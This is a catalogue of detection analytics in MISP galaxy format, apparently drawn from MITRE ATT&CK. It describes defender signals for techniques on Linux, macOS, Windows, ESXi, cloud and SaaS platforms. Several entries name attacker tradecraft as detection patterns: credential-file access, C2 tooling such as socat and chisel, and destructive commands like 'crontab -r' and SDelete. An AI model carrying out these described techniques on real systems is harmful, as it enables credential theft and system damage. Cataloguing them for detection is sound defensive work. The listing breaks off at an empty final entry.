external_id AN0706
mitre_platforms ['Linux']

Analytic 0760 - AN0760

Processes like curl, wget, python, socat, or custom binaries initiating TLS/SSL sessions to non-standard destinations. Defender sees abnormal syscalls for connect(), loading of libssl libraries, and persistent outbound encrypted traffic from daemons not normally communicating externally.

Internal MISP references

UUID f0dacfba-bcc0-43cb-bad5-0cd3fe3a7f5f which can be used as unique global reference for Analytic 0760 - AN0760 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0760
mitre_platforms ['Linux']

Analytic 0068 - AN0068

Detection of packed Mach-O binaries unpacking into memory and transferring control to dynamically modified code segments.

Internal MISP references

UUID 003c2ca3-a9a8-4a56-9163-f6733f19b41d which can be used as unique global reference for Analytic 0068 - AN0068 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0068
mitre_platforms ['macOS']

Analytic 0860 - AN0860

Access to local credential/config files (e.g., ~/.aws/credentials) followed by metadata API calls or cloud role assumptions.

Internal MISP references

UUID 01d19202-019e-43c9-a5e9-e1e2a38eb738 which can be used as unique global reference for Analytic 0860 - AN0860 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0860
mitre_platforms ['IaaS']

Analytic 0680 - AN0680

Unusual or excessive database/table exports from SaaS database platforms (e.g., Snowflake, Firebase, BigQuery, Airtable) by users or apps not in known analytics or dev groups. Defender observes access patterns outside baseline working hours or with new query templates, and correlates those with audit logs or file downloads.

Internal MISP references

UUID 544c832f-4849-4fb7-a851-5f69ec0692a9 which can be used as unique global reference for Analytic 0680 - AN0680 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0680
mitre_platforms ['SaaS']

Analytic 0608 - AN0608

Detects adversary manipulation of Extra Window Memory (EWM) in a GUI process, where the attacker uses SetWindowLong or SetClassLong to redirect function pointers to injected shellcode stored in shared memory, then triggers execution via a window message like SendNotifyMessage.

Internal MISP references

UUID 6ec034ac-289d-48d1-b310-021dfbf7087b which can be used as unique global reference for Analytic 0608 - AN0608 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0608
mitre_platforms ['Windows']

Analytic 0086 - AN0086

Outlook form execution upon message receipt or client launch results in automated code execution within user session. Form definitions deviate from standard templates and include script logic or COM object calls embedded in form fields.

Internal MISP references

UUID 73ec21b3-5679-44a9-bac3-943060bed786 which can be used as unique global reference for Analytic 0086 - AN0086 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0086
mitre_platforms ['Office Suite']

Analytic 0806 - AN0806

Detects crontab job additions or modifications via crontab utility or direct edits, especially those created by interactive users executing hidden or renamed scripts.

Internal MISP references

UUID 8a764f0e-4bcd-413d-bbf0-1a10cb98b598 which can be used as unique global reference for Analytic 0806 - AN0806 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0806
mitre_platforms ['macOS']

Analytic 0609 - AN0609

Unusual modifications to service binary paths, registry keys, or DLL load paths resulting in alternate execution flow. Defender observes registry key modifications, suspicious file writes into system directories, and processes loading libraries from abnormal paths.

Internal MISP references

UUID 248be939-35f5-4c8a-9e21-b6de514da577 which can be used as unique global reference for Analytic 0609 - AN0609 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0609
mitre_platforms ['Windows']

Analytic 0069 - AN0069

Detects unauthorized access, copying, or modification of Kerberos ccache files (krb5cc_%UID% or krb5.ccache) in /tmp or custom paths defined by KRB5CCNAME. Correlates file access with suspicious processes (e.g., credential dumping tools) and subsequent anomalous Kerberos authentication requests from non-standard processes.

Internal MISP references

UUID 3651d7d0-dfc7-4b36-aaf2-4eb0eb39167d which can be used as unique global reference for Analytic 0069 - AN0069 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0069
mitre_platforms ['Linux']

Analytic 0096 - AN0096

Detects execution of common process enumeration utilities (e.g., ps, top, htop) or access to /proc with suspicious ancestry. Correlates command usage with interactive shell context and user role.

Internal MISP references

UUID 59aedd87-8373-45d3-93e3-5697e4cc7a48 which can be used as unique global reference for Analytic 0096 - AN0096 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0096
mitre_platforms ['Linux']

Analytic 0690 - AN0690

Detects creation of cloud instances, services, or resources in normally unused or unsupported regions, especially following initial account access or credential use from known regions. Correlates resource provisioning across regions with absence of historical usage and alerting from standard logging services (e.g., GuardDuty not enabled in that region).

Internal MISP references

UUID 5d4419cc-6925-4f7d-a247-e0a4634fea90 which can be used as unique global reference for Analytic 0690 - AN0690 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0690
mitre_platforms ['IaaS']

Analytic 0960 - AN0960

Use of instance metadata tokens across instances or misuse of short-lived tokens issued for different roles.

Internal MISP references

UUID 91681b37-7fc7-418c-b4fd-35bebe1d151e which can be used as unique global reference for Analytic 0960 - AN0960 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0960
mitre_platforms ['IaaS']

Analytic 0906 - AN0906

Detects shell or API usage of esxcli network ip connection list or netstat to enumerate ESXi host connections.

Internal MISP references

UUID d42c2a80-bf02-460f-b279-147940ece3a9 which can be used as unique global reference for Analytic 0906 - AN0906 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0906
mitre_platforms ['ESXi']

Analytic 0770 - AN0770

Detection of rogue Domain Controller registration and Active Directory replication abuse by correlating: (1) creation/modification of nTDSDSA and server objects in the Configuration partition, (2) unexpected usage of Directory Replication Service SPNs (GC/ or E3514235-4B06-11D1-AB04-00C04FC2DCD2), (3) replication RPC calls (DrsAddEntry, DrsReplicaAdd, GetNCChanges) originating from non-DC hosts, and (4) Kerberos authentication by non-DC machines using DRS-related SPNs. These events in combination, especially from hosts outside the Domain Controllers OU, may indicate DCShadow or rogue DC activity.

Internal MISP references

UUID 34fecfa5-24fb-46c1-955f-68ecd4cc402c which can be used as unique global reference for Analytic 0770 - AN0770 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0770
mitre_platforms ['Windows']

Analytic 0077 - AN0077

Detects applications such as Automator, AppleScript, or LaunchDaemons invoking HTTP/S traffic to non-standard domains or using suspicious headers (e.g., Base64 in URIs or cookie fields).

Internal MISP references

UUID 5ff3ae40-d326-4eae-9bc5-c77ddcb6cb6e which can be used as unique global reference for Analytic 0077 - AN0077 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0077
mitre_platforms ['macOS']

Analytic 0707 - AN0707

Detect abnormal access to unified logs via log show or fs_usage targeting system log files. Monitor for execution of shell utilities (cat, grep) against /var/log/system.log and for plist modifications enabling verbose logging.

Internal MISP references

UUID 8f998965-ad70-4ec6-8bc1-85831edc0497 which can be used as unique global reference for Analytic 0707 - AN0707 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0707
mitre_platforms ['macOS']

Analytic 0078 - AN0078

Detects HTTP or HTTPS communication initiated by shell-based scripts or management daemons, especially those reaching public IPs over ports 80/443 using embedded curl or wget.

Internal MISP references

UUID 38205f16-18da-4d04-ae54-f5143b75c938 which can be used as unique global reference for Analytic 0078 - AN0078 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0078
mitre_platforms ['ESXi']

Analytic 0807 - AN0807

Detects direct modification of crontab entries in /var/spool/cron/crontabs/root or /etc/rc.local.d/local.sh followed by execution of scripts linked to lateral movement or malware persistence.

Internal MISP references

UUID 3ea6b02e-47e0-4815-9190-4e95eb51e779 which can be used as unique global reference for Analytic 0807 - AN0807 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0807
mitre_platforms ['ESXi']

Analytic 0708 - AN0708

Monitor for cloud API calls that export or collect guest or system logs. Abnormal use of Azure VM Agent’s CollectGuestLogs.exe or AWS CloudWatch GetLogEvents across multiple instances should be correlated with lateral movement or data staging.

Internal MISP references

UUID 42bae633-1033-40da-bf3a-87bcd1b0297f which can be used as unique global reference for Analytic 0708 - AN0708 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0708
mitre_platforms ['IaaS']

Analytic 0780 - AN0780

Monitor launchd service definitions and property list (.plist) modifications for non-standard executables. Detect unauthorized processes registered as launch daemons or agents.

Internal MISP references

UUID 63d21290-b858-4c4e-9447-31d623048048 which can be used as unique global reference for Analytic 0780 - AN0780 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0780
mitre_platforms ['macOS']

Analytic 0087 - AN0087

Detects modifications to IAM conditions or policies that alter authentication behavior, such as adding permissive trusted IPs, removing MFA requirements, or changing regional access restrictions. Behavioral detection focuses on anomalous policy updates tied to privileged accounts and subsequent suspicious logon activity from previously blocked regions or devices.

Internal MISP references

UUID b88f87d2-4a64-44a2-937e-85a929203843 which can be used as unique global reference for Analytic 0087 - AN0087 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0087
mitre_platforms ['IaaS']

Analytic 0870 - AN0870

Detection of fake or spoofed macOS Security & Privacy GUIs showing healthy status after XProtect, Gatekeeper, or AV processes are disabled. Correlates user-space UI process creation with terminated or missing security daemons.

Internal MISP references

UUID d9eb3056-115b-496a-89f7-be38470ff022 which can be used as unique global reference for Analytic 0870 - AN0870 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0870
mitre_platforms ['macOS']

Analytic 0079 - AN0079

Detects Web protocol misuse such as encoded HTTP headers, WebSocket upgrade requests with abnormal payloads, or TLS handshake anomalies suggesting embedded C2 channels.

Internal MISP references

UUID 1f1ed319-a6f9-4f30-9254-e0b1927a6bd9 which can be used as unique global reference for Analytic 0079 - AN0079 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0079
mitre_platforms ['Network Devices']

Analytic 0790 - AN0790

ESXi services (vmx, hostd) generating outbound HTTPS POST requests to text storage sites. Defender perspective: anomalous datastore or log reads chained with traffic to pastebin-like destinations.

Internal MISP references

UUID 58a609cb-b266-4a1a-a40f-9e4cd5d591ce which can be used as unique global reference for Analytic 0790 - AN0790 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0790
mitre_platforms ['ESXi']

Analytic 0097 - AN0097

Monitors execution of ps, top, or launchctl with unusual parent processes or from terminal scripts. Also detects AppleScript-based process listing or system_profiler SPApplicationsDataType misuse.

Internal MISP references

UUID 80939714-6d17-4cc0-accd-3e1d634846bc which can be used as unique global reference for Analytic 0097 - AN0097 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0097
mitre_platforms ['macOS']

Analytic 0970 - AN0970

Kernel or userland processes generating high-rate network traffic (ICMP, UDP, TCP SYN) beyond expected interface throughput or user behavior norms.

Internal MISP references

UUID a94c1081-d66b-4009-95a9-247721fcd394 which can be used as unique global reference for Analytic 0970 - AN0970 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0970
mitre_platforms ['Linux']

Analytic 0907 - AN0907

Detects interactive or automated use of CLI commands like show ip sockets, show tcp brief, or SNMP queries for active sessions on routers/switches.

Internal MISP references

UUID c6208aa1-fa6e-4d9d-a284-dd0aab1ee31c which can be used as unique global reference for Analytic 0907 - AN0907 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0907
mitre_platforms ['Network Devices']

Analytic 0709 - AN0709

Monitor ESXi shell or API access to host logs under /var/log/. Abnormal enumeration of vmkernel.log, hostd.log, or vpxa.log by unauthorized accounts should be flagged.

Internal MISP references

UUID f5b9ad98-3a10-4ff3-9e25-890488253bef which can be used as unique global reference for Analytic 0709 - AN0709 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0709
mitre_platforms ['ESXi']

Analytic 0880 - AN0880

Adversaries create the 'Office Test\Special\Perf' registry key and specify a malicious DLL path that is auto-loaded when an Office application starts. This DLL is injected into the Office process memory space and can provide persistent execution without requiring macro enablement.

Internal MISP references

UUID 80be1bd7-b4e8-4d1b-b294-56b1c073bbe0 which can be used as unique global reference for Analytic 0880 - AN0880 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0880
mitre_platforms ['Windows']

Analytic 0088 - AN0088

Detects suspicious updates to conditional access or MFA enforcement policies in identity providers such as Entra ID, Okta, or JumpCloud. Focus is on removal of policy blocks, addition of broad exclusions, or registration of adversary-controlled MFA methods, followed by anomalous login activity that takes advantage of the modified policies.

Internal MISP references

UUID 9eb2a081-e252-4009-a16e-90c9a85f70f1 which can be used as unique global reference for Analytic 0088 - AN0088 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0088
mitre_platforms ['Identity Provider']

Analytic 0808 - AN0808

Detects web console login events followed by read-only or metadata retrieval activity from GUI sources (e.g., browser session, mobile client) rather than API/CLI sources. Correlates across CloudTrail, IAM identity logs, and user-agent context.

Internal MISP references

UUID c8a50f3f-105a-4107-9781-a3d75479e93d which can be used as unique global reference for Analytic 0808 - AN0808 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0808
mitre_platforms ['IaaS']

Analytic 0809 - AN0809

Detects successful login to cloud identity portals (e.g., Okta, Azure AD, Google Identity) from atypical geolocations, devices, or user agents immediately followed by dashboard/portal navigation to sensitive pages such as user or app configuration.

Internal MISP references

UUID 041c0b93-fda4-478f-b847-d10619db729c which can be used as unique global reference for Analytic 0809 - AN0809 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0809
mitre_platforms ['Identity Provider']

Analytic 0980 - AN0980

Unusual use of screen capture APIs (e.g., CopyFromScreen) or command-line tools to write image files to disk.

Internal MISP references

UUID 20e00aff-6389-4c8a-8e38-3b63924e1612 which can be used as unique global reference for Analytic 0980 - AN0980 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0980
mitre_platforms ['Windows']

Analytic 0098 - AN0098

Detects process enumeration using esxcli system process list or ps on ESXi shell or via unauthorized SSH sessions. Correlates with interactive sessions and abnormal user roles.

Internal MISP references

UUID 7e029a7f-beb5-4da9-9d75-8fcfc812103b which can be used as unique global reference for Analytic 0098 - AN0098 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0098
mitre_platforms ['ESXi']

Analytic 0908 - AN0908

Detects enumeration of cloud network interfaces, VPCs, subnets, or peer connections using CLI or SDKs (e.g., AWS CLI, Azure CLI, GCloud CLI).

Internal MISP references

UUID 914a5b13-5977-4e62-abab-9ee03e72624f which can be used as unique global reference for Analytic 0908 - AN0908 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0908
mitre_platforms ['IaaS']

Analytic 0089 - AN0089

Execution of binaries with invalid digital signatures, where metadata claims code is signed but validation fails. Behavior is often correlated with suspicious parent processes or unexpected execution paths.

Internal MISP references

UUID bf6b3f42-a7a5-4e6d-840a-e892aa74916c which can be used as unique global reference for Analytic 0089 - AN0089 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0089
mitre_platforms ['Windows']

Analytic 0890 - AN0890

Unusual ESXi shell commands disabling syslog forwarding or stopping hostd/vpxa daemons. Detect modifications to firewall rules on ESXi host or disabling of lockdown mode.

Internal MISP references

UUID d2762796-1dea-448a-970a-7aeb176aa668 which can be used as unique global reference for Analytic 0890 - AN0890 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0890
mitre_platforms ['ESXi']

Analytic 0990 - AN0990

Detects unauthorized applications or scripts accessing sensitive data followed by establishing encrypted outbound communication to rare external destinations or with abnormal byte ratios.

Internal MISP references

UUID deb57305-6324-404d-a9d0-00aa0c285920 which can be used as unique global reference for Analytic 0990 - AN0990 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0990
mitre_platforms ['macOS']

Analytic 0099 - AN0099

Monitors CLI-based execution of show process or equivalent on routers/switches. Correlates unusual device access, unauthorized roles, or config mode changes.

Internal MISP references

UUID f6985c70-6de1-4600-aba0-5b3324184dce which can be used as unique global reference for Analytic 0099 - AN0099 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0099
mitre_platforms ['Network Devices']

Analytic 0909 - AN0909

Unusual execution of virtualization binaries (VBoxManage.exe, vmware-vmx.exe, vmwp.exe) with headless or suppressed notification arguments. Registry and service modifications linked to virtualization installs. Defender view: anomalies in process creation, service metadata, and registry writes tied to enabling hidden VMs.

Internal MISP references

UUID f94e2ae3-7c79-4796-96a1-e462828f9c13 which can be used as unique global reference for Analytic 0909 - AN0909 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0909
mitre_platforms ['Windows']

Analytic 0111 - AN0111

Inspect unified logs for anomalous DNS resolutions triggered by non-network applications. Flag repeated connections to newly registered or algorithmically generated domains. Correlate with endpoint process telemetry.

Internal MISP references

UUID 5e225927-bf50-4261-b1ae-d65e803da0b8 which can be used as unique global reference for Analytic 0111 - AN0111 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0111
mitre_platforms ['macOS']

Analytic 1101 - AN1101

Adversary invokes 'dpkg -l', 'rpm -qa', or other package managers via shell or script to enumerate installed software.

Internal MISP references

UUID c14042f6-5ebd-42a2-b293-b2367b300fb6 which can be used as unique global reference for Analytic 1101 - AN1101 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1101
mitre_platforms ['Linux']

Analytic 1011 - AN1011

Monitor unified logs and Mail.app activity for repetitive incoming messages with attachments. Defenders should look for large volumes of incoming mail stored under ~/Library/Mail with unusual timing or repetitive subjects.

Internal MISP references

UUID d41cdfc1-2a82-4442-a1ca-177fe59b8dff which can be used as unique global reference for Analytic 1011 - AN1011 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1011
mitre_platforms ['macOS']

Analytic 1110 - AN1110

Web servers (e.g., httpd) spawning abnormal processes post file upload into /Library/WebServer/Documents or /usr/local/var/www

Internal MISP references

UUID e5a0bbf3-e5d0-41f1-b757-c67eccece77b which can be used as unique global reference for Analytic 1110 - AN1110 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1110
mitre_platforms ['macOS']

Analytic 0121 - AN0121

Detection of system calls or commands accessing system locale (e.g., 'defaults read -g AppleLocale', 'systemsetup -gettimezone'). Correlate with unusual parent processes or execution contexts.

Internal MISP references

UUID 0521835b-bc02-41ed-8e6a-153e6422ee9c which can be used as unique global reference for Analytic 0121 - AN0121 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0121
mitre_platforms ['macOS']

Analytic 0211 - AN0211

Detects abuse of Mono/.NET Core environments to execute VB-like scripts, often in environments with Office emulation or WINE. Focus is on rare invocations of scripting hosts like mono.exe or .NET shells, often seen in spam filtering or forensic labs with Office support.

Internal MISP references

UUID 08318de4-1327-48ac-a686-403162d3891f which can be used as unique global reference for Analytic 0211 - AN0211 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0211
mitre_platforms ['Linux']

Analytic 1021 - AN1021

Tools such as tor, nglite, proxychains, chisel, or custom daemons repeatedly initiate outbound sessions to multiple nodes before final destination. This behavior is abnormal for Linux services outside of VPN, monitoring, or CDN relay contexts.

Internal MISP references

UUID 2416a634-3ad9-4f91-a894-8fb0d9d83b76 which can be used as unique global reference for Analytic 1021 - AN1021 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1021
mitre_platforms ['Linux']

Analytic 1201 - AN1201

Detects attempts to access or enumerate cloud password/secrets storage services such as AWS Secrets Manager, Azure Key Vault, or GCP Secret Manager. Monitors API calls for abnormal enumeration or bulk retrieval of secrets.

Internal MISP references

UUID 2c8326bd-dd59-4715-87ef-dc3bdef919fb which can be used as unique global reference for Analytic 1201 - AN1201 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1201
mitre_platforms ['IaaS']

Analytic 0112 - AN0112

Monitor esxcli and syslog records for DNS resolver changes or repeated queries to unusual external domains by management agents. Detect unauthorized changes to VM or host network settings that redirect DNS lookups.

Internal MISP references

UUID 3166927d-91e4-4e08-bfec-abda2783be8c which can be used as unique global reference for Analytic 0112 - AN0112 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0112
mitre_platforms ['ESXi']

Analytic 1210 - AN1210

Detection centers on DYLD_INSERT_LIBRARIES and DYLD_LIBRARY_PATH abuse. Defender perspective: monitor for modification of these environment variables in shell or plist files, file creation of dylibs in user-controlled paths, and correlation of environment variable usage with unexpected module loads by user applications. Suspicious indicators include processes with DYLD_INSERT_LIBRARIES set, execution of applications loading untrusted dylibs, and anomalies in module load history.

Internal MISP references

UUID 5907bfc2-a5d6-4ff1-bba8-8b94c9835ed6 which can be used as unique global reference for Analytic 1210 - AN1210 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1210
mitre_platforms ['macOS']

Analytic 1120 - AN1120

LaunchAgent or launchd recurring jobs initiating data transfer to consistent external IPs or domains with repeat timing signatures.

Internal MISP references

UUID 837bd639-c291-4e42-b737-6a21d6bf8fd5 which can be used as unique global reference for Analytic 1120 - AN1120 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1120
mitre_platforms ['macOS']

Analytic 1102 - AN1102

Adversary runs 'system_profiler SPApplicationsDataType' or queries plist files to enumerate software via Terminal or scripts.

Internal MISP references

UUID a1619e8f-10aa-46ab-8776-898e8c3d5b43 which can be used as unique global reference for Analytic 1102 - AN1102 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1102
mitre_platforms ['macOS']

Analytic 2011 - AN2011

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during exfiltration (ex: Transfer Data to Cloud Account).

Internal MISP references

UUID cce3f1e3-a688-4519-bd9b-0ec5ba57bc11 which can be used as unique global reference for Analytic 2011 - AN2011 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2011
mitre_platforms ['PRE']

Analytic 1012 - AN1012

Burst of incomplete TCP handshakes (e.g., SYN floods) or uncorrelated ACK packets targeting the state table resulting in OS resource exhaustion.

Internal MISP references

UUID cecfe3bc-525a-431e-8ee1-5133ab8ce79c which can be used as unique global reference for Analytic 1012 - AN1012 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1012
mitre_platforms ['Windows']

Analytic 1031 - AN1031

Detects adversarial abuse of WMI to execute local or remote commands via WMIC, PowerShell, or COM API through a multi-event chain: process creation, command execution, and corresponding network connection if remote.

Internal MISP references

UUID 17687fa0-bfbf-4ff2-9eb0-520538e6af31 which can be used as unique global reference for Analytic 1031 - AN1031 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1031
mitre_platforms ['Windows']

Analytic 1103 - AN1103

Adversary uses cloud-native APIs or CLI (e.g., AWS Systems Manager, Azure Resource Graph) to list installed software on cloud workloads.

Internal MISP references

UUID 3ccd6662-c579-494f-bbfa-ffc3530e3db2 which can be used as unique global reference for Analytic 1103 - AN1103 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1103
mitre_platforms ['IaaS']

Analytic 1301 - AN1301

Detects upload of malicious or unusual file types into cloud-shared folders, followed by user downloads or interactions.

Internal MISP references

UUID 49e91c60-9b73-4a0a-9510-f94152a8ba5e which can be used as unique global reference for Analytic 1301 - AN1301 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1301
mitre_platforms ['SaaS']

Analytic 0113 - AN0113

Detects adversary activity that removes persistence artifacts such as services, registry keys, scheduled tasks, user accounts, and binaries through commands like sc delete, schtasks /delete, or reg delete.

Internal MISP references

UUID 5882d2ff-289e-454d-9146-81306c154be3 which can be used as unique global reference for Analytic 0113 - AN0113 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0113
mitre_platforms ['Windows']

Analytic 0311 - AN0311

Monitoring modification and execution of user or system logon scripts such as in registry Run keys or startup folders.

Internal MISP references

UUID 682bd971-c540-4c16-a25a-b928201a320d which can be used as unique global reference for Analytic 0311 - AN0311 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0311
mitre_platforms ['Windows']

Analytic 1130 - AN1130

Discovery of connected SaaS applications, APIs, or configurations within platforms like Salesforce, Slack, or Zoom. Defender perspective includes enumeration of available integrations, abnormal querying of service metadata, and follow-on attempts to exploit or persist via discovered services.

Internal MISP references

UUID a0730d9f-0a05-4153-8c6a-6f04f9f7346c which can be used as unique global reference for Analytic 1130 - AN1130 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1130
mitre_platforms ['SaaS']

Analytic 1310 - AN1310

Detects file access to mbox/maildir files in conjunction with curl/wget/postfix execution, or anomalous shell scripts harvesting user mail directories.

Internal MISP references

UUID ba43428d-b5d2-4815-a614-42ff1ea816a9 which can be used as unique global reference for Analytic 1310 - AN1310 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1310
mitre_platforms ['Linux']

Analytic 0131 - AN0131

Detects adversaries accessing remote mail systems (e.g., Exchange Online, O365) using stolen credentials or OAuth tokens, followed by scripted access to mailbox contents via PowerShell, AADInternals, or unattended API queries. Detection focuses on abnormal logon sessions, user agents, IP locations, and scripted or tool-based email data access.

Internal MISP references

UUID c42179a8-71c5-41ba-bbfa-d6c1a93e729b which can be used as unique global reference for Analytic 0131 - AN0131 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0131
mitre_platforms ['Windows']

Analytic 1013 - AN1013

Flood of spoofed SYN or ACK packets causing exhaustion of OS TCP state table, potentially via user-space utilities or kernel-level DoS agents.

Internal MISP references

UUID fde025ac-a180-472c-a9b5-b4fa1e97cc75 which can be used as unique global reference for Analytic 1013 - AN1013 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1013
mitre_platforms ['Linux']

Analytic 1104 - AN1104

Adversary uses 'esxcli software vib list' to enumerate installed VIBs, drivers, and modules.

Internal MISP references

UUID 0119786d-ee1e-4857-b31a-3a43830e28e7 which can be used as unique global reference for Analytic 1104 - AN1104 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1104
mitre_platforms ['ESXi']

Analytic 0141 - AN0141

Suspicious file creation or modification in directories ignored by XProtect or AV exclusions (e.g., ~/Library, temporary cache directories). Defender perspective: monitor file events in ignored paths with correlation to execution or persistence activity.

Internal MISP references

UUID 3643a313-1aa7-44d1-b3e2-e97ad65c6837 which can be used as unique global reference for Analytic 0141 - AN0141 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0141
mitre_platforms ['macOS']

Analytic 1410 - AN1410

Adversary mounts a USB device and begins enumerating, copying, or compressing files using scripting engines, cmd, or remote access tools.

Internal MISP references

UUID 4385bff9-e730-48cd-bdfc-43de56c302aa which can be used as unique global reference for Analytic 1410 - AN1410 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1410
mitre_platforms ['Windows']

Analytic 1014 - AN1014

Adversary tool/script issuing mass SYN/ACK floods that degrade OS responsiveness and interrupt service response on macOS endpoints.

Internal MISP references

UUID 4db0f97c-a0c4-4c96-af56-86c6b227ea42 which can be used as unique global reference for Analytic 1014 - AN1014 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1014
mitre_platforms ['macOS']

Analytic 1401 - AN1401

Detects memory-based injection by monitoring task_for_pid, mach_vm_write, and dylib injection patterns through DYLD_INSERT_LIBRARIES or manual memory mapping.

Internal MISP references

UUID 5439d083-91d6-4369-9406-8cfb2cf5cbde which can be used as unique global reference for Analytic 1401 - AN1401 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1401
mitre_platforms ['macOS']

Analytic 0411 - AN0411

Adversary spawns command-line tools (e.g., del, cipher /w, SDelete) or scripts to recursively delete or overwrite user/system files. This may be correlated with abnormal file IO activity, registry writes, or tampering in critical system directories.

Internal MISP references

UUID 791dfdd4-b04d-498a-accc-ee9e2acc7b14 which can be used as unique global reference for Analytic 0411 - AN0411 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0411
mitre_platforms ['Windows']

Analytic 0114 - AN0114

Detects removal of persistence artifacts such as crontab entries, systemd service units, and malicious user accounts through commands like crontab -r, rm /etc/systemd/system/*.service, or userdel.

Internal MISP references

UUID 83a2f3c2-24c5-466d-8453-aa52802c2991 which can be used as unique global reference for Analytic 0114 - AN0114 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0114
mitre_platforms ['Linux']

Analytic 1041 - AN1041

Use of file enumeration commands (e.g., 'ls', 'find', 'locate') executed by suspicious users or scripts accessing broad file hierarchies or restricted directories.

Internal MISP references

UUID b50bf863-644a-48c2-85a3-2c633f135650 which can be used as unique global reference for Analytic 1041 - AN1041 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1041
mitre_platforms ['Linux']

Analytic 1140 - AN1140

